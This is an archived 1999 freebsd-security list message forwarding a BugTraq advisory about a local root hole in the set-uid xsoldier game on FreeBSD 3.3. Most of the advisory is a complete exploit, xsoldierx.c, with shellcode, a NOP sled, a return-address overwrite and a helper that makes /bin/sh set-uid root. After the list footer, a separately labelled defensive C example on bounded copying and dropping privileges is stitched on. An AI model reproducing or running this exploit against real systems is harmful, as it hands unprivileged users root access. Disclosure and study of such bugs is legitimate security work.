From owner-freebsd-security Wed Dec 15 21:11:33 1999
Delivered-To: freebsd-security@freebsd.org
Received: from anarcat.dyndns.org (phobos.IRO.UMontreal.CA [132.204.20.20]) by hub.freebsd.org (Postfix) with ESMTP id DD1BE1558B for ; Wed, 15 Dec 1999 21:11:24 -0800 (PST) (envelope-from spidey@anarcat.dyndns.org)
Received: by anarcat.dyndns.org (Postfix, from userid 1000) id 16DA21B33; Thu, 16 Dec 1999 00:11:23 -0500 (EST)
From: Spidey
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <14424.29817.586093.109020@anarcat.dyndns.org>
Date: Thu, 16 Dec 1999 00:11:21 -0500 (EST)
To: Chris England
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: From BugTraq - FreeBSD 3.3 xsoldier root exploit (fwd)
References:
X-Mailer: VM 6.72 under 21.1 (patch 7) "Biscayne" XEmacs Lucid
Reply-To: Spidey
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

A patch has been committed today in the ports collection. I have not tested either the patched or the unpatched proggies...

The AnarCat

--- Big Brother told Chris England to write, at 20:36 of December 15:
> I personally have not tested this. I'm not too big on games, but I would
> recommend anyone who has this game installed suid-root to test the snippet
> code against it and post the results to this list.
>
> Cheers,
> -Chris England
>
>
> ---------- Forwarded message ----------
> Date: Wed, 15 Dec 1999 17:11:36 MST
> From: Brock Tellier
> To: BUGTRAQ@SECURITYFOCUS.COM
> Subject: FreeBSD 3.3 xsoldier root exploit
>
> Greetings,
>
> OVERVIEW
> A vulnerability in FreeBSD 3.3's xsoldier will allow any user to gain root
> access. This user does not have to have a valid $DISPLAY to exploit this.
>
> BACKGROUND
> Only FreeBSD 3.3-RELEASE has been tested. xsoldier, suid-root by default, was
> installed as part of the X11 games packages via /stand/sysinstall.
>
> DETAILS
> More problems with FreeBSD 3.3 ports. This time with xsoldier, a suid-root
> game. A simple overflow in the -display option allows any user to gain root.
> Although xsoldier only runs under X, a long -display arg on the CL will allow
> us to gain root.
>
> --- xsoldierx.c ---
> /*
>  * xsoldier exploit for Freebsd-3.3-RELEASE
>  * Drops a suid root shell in /bin/sh
>  * Brock Tellier btellier@usa.net
>  */
>
> #include <stdio.h>
> #include <stdlib.h>
> #include <unistd.h>
>
> /* FreeBSD execve() shellcode; the odd ">:)(:<" bytes are patched into a
>  * null-free "lcall 7,0" at run time, so they must stay exactly as written. */
> char shell[]= /* mudge@l0pht.com */
> "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
> "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
> "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
> "\x9a>:)(:<\xe8\xc6\xff\xff\xff/tmp/ui";
>
> /* Source of the helper the shellcode runs as root: marks /bin/sh set-uid. */
> #define CODE "#include <sys/stat.h>\nint main(void) { chmod(\"/bin/sh\", 0004555); return 0; }\n"
>
> /* Write and compile /tmp/ui, the program the shellcode execve()s. */
> void buildui(void) {
>     FILE *fp;
>     char cc[100];
>     fp = fopen("/tmp/ui.c", "w");
>     if (fp == NULL) { perror("fopen /tmp/ui.c"); exit(1); }
>     fputs(CODE, fp);
>     fclose(fp);
>     snprintf(cc, sizeof(cc), "cc -o /tmp/ui /tmp/ui.c");
>     if (system(cc) != 0) { fprintf(stderr, "compiling /tmp/ui failed\n"); exit(1); }
> }
>
> int main(int argc, char *argv[]) {
>     int x = 0;
>     int y = 0;
>     int offset = 0;
>     int bsize = 4400;
>     char buf[bsize + 1];                 /* +1 so the terminating NUL stays in bounds */
>     unsigned int eip = 0xbfbfdb65;       /* works for me */
>     buildui();
>
>     if (argc > 1) {                      /* optional offset to adjust the guessed return address */
>         offset = atoi(argv[1]);
>         eip = eip + offset;
>     }
>     fprintf(stderr, "xsoldier exploit for FreeBSD 3.3-RELEASE\n");
>     fprintf(stderr, "Drops you a suid-root shell in /bin/sh\n");
>     fprintf(stderr, "eip=0x%x offset=%d buflen=%d\n", eip, offset, bsize);
>
>     for (x = 0; x < 4325; x++) buf[x] = 0x90;            /* NOP sled */
>     fprintf(stderr, "NOPs to %d\n", x);
>
>     for (y = 0; y < 67; x++, y++) buf[x] = shell[y];     /* shellcode, 67 bytes */
>     fprintf(stderr, "Shellcode to %d\n", x);
>
>     buf[x++] = eip & 0x000000ff;                         /* return address, little-endian */
>     buf[x++] = (eip & 0x0000ff00) >> 8;
>     buf[x++] = (eip & 0x00ff0000) >> 16;
>     buf[x++] = (eip & 0xff000000) >> 24;
>     fprintf(stderr, "eip to %d\n", x);
>
>     while (x < bsize) buf[x++] = 0x90;                   /* pad the tail instead of leaving it uninitialised */
>     buf[bsize] = '\0';
>
>     execl("/usr/X11R6/bin/xsoldier", "xsoldier", "-display", buf, (char *)NULL);
>     perror("execl");                                     /* only reached if the exec failed */
>     return 1;
> }
>
> -------
>
> Brock Tellier
> UNIX Systems Administrator
> Chicago, IL, USA
> btellier@usa.net

--
If the image gives the illusion of knowing,
it is because the adage holds that, in order to believe,
all that matters is to see.
Lofofora

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
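Added example, not code from this thread or from the xsoldier sources: the bug class the advisory describes (a command-line value copied into a fixed-size stack buffer by a set-uid root program) next to the two fixes a reviewer would ask for, a bounded copy that rejects overlong input and a privilege drop before argv is parsed. DISPLAY_MAX and every function name below are assumptions chosen for the illustration; the post does not give xsoldier's real buffer size.

```c
/*
 * Added illustration, not xsoldier's code. DISPLAY_MAX, the function names
 * and the sample inputs are assumptions for the demonstration.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

#define DISPLAY_MAX 256   /* assumed limit; real display names are tens of bytes */

/*
 * The vulnerable pattern (defined for comparison, never called here):
 * strcpy() with no length check. A -display argument of 4400 bytes, as the
 * exploit above builds, runs past `display` and over the saved return address.
 */
void open_display_unsafe(const char *arg)
{
    char display[DISPLAY_MAX];
    strcpy(display, arg);              /* overflows if strlen(arg) >= DISPLAY_MAX */
    printf("connecting to %s\n", display);
}

/*
 * Fix 1: bound the copy and refuse, rather than truncate, anything that does
 * not fit together with its terminating NUL. Silent truncation would only turn
 * the overflow into a confusing connection failure.
 * Returns 0 on success, -1 if the argument is too long.
 */
int copy_display_arg(char *dst, size_t dstsz, const char *arg)
{
    size_t n = strlen(arg);
    if (n >= dstsz)
        return -1;
    memcpy(dst, arg, n + 1);           /* n + 1 copies the NUL as well */
    return 0;
}

/*
 * Fix 2: a set-uid game needs root, if at all, only to open its score file.
 * Drop back to the invoking user before argv is parsed, so a later overflow
 * is a crash in an unprivileged process, not a root shell. setgid() goes
 * first because it can fail once uid 0 has been given up.
 * Returns 0 on success, -1 on failure (errno is set by the failing call).
 */
int drop_privileges(void)
{
    if (setgid(getgid()) != 0)
        return -1;
    if (setuid(getuid()) != 0)
        return -1;
    /* Verify the drop stuck: a non-root user must not be able to regain uid 0. */
    if (getuid() != 0 && setuid(0) == 0)
        return -1;
    return 0;
}

/*
 * Check helper: builds an argument of `len` 'A' bytes (constructed input,
 * standing in for the exploit's NOP sled) and reports 1 if copy_display_arg()
 * accepts it, 0 if it rejects it, -1 if the buffer could not be allocated.
 */
int accepts_arg_of_length(size_t len)
{
    char display[DISPLAY_MAX];
    char *arg = malloc(len + 1);
    int rc;
    if (arg == NULL)
        return -1;
    memset(arg, 'A', len);
    arg[len] = '\0';
    rc = copy_display_arg(display, sizeof display, arg);
    free(arg);
    return rc == 0;
}

int main(int argc, char *argv[])
{
    char display[DISPLAY_MAX];
    const char *arg = (argc > 2 && strcmp(argv[1], "-display") == 0) ? argv[2] : ":0.0";

    if (drop_privileges() != 0) {
        perror("drop_privileges");
        return 1;
    }
    if (copy_display_arg(display, sizeof display, arg) != 0) {
        fprintf(stderr, "-display argument too long (max %d bytes)\n", DISPLAY_MAX - 1);
        return 1;
    }
    printf("display: %s (uid %u, euid %u)\n", display, (unsigned)getuid(), (unsigned)geteuid());
    return 0;
}
```

Run as `./a.out -display "$(head -c 4400 /dev/zero | tr '\0' A)"` and the hardened version exits with a usage error where the strcpy() version would have smashed its stack; the privilege drop is the point that turns such a bug from a root exploit into an ordinary crash even when a bound is missed.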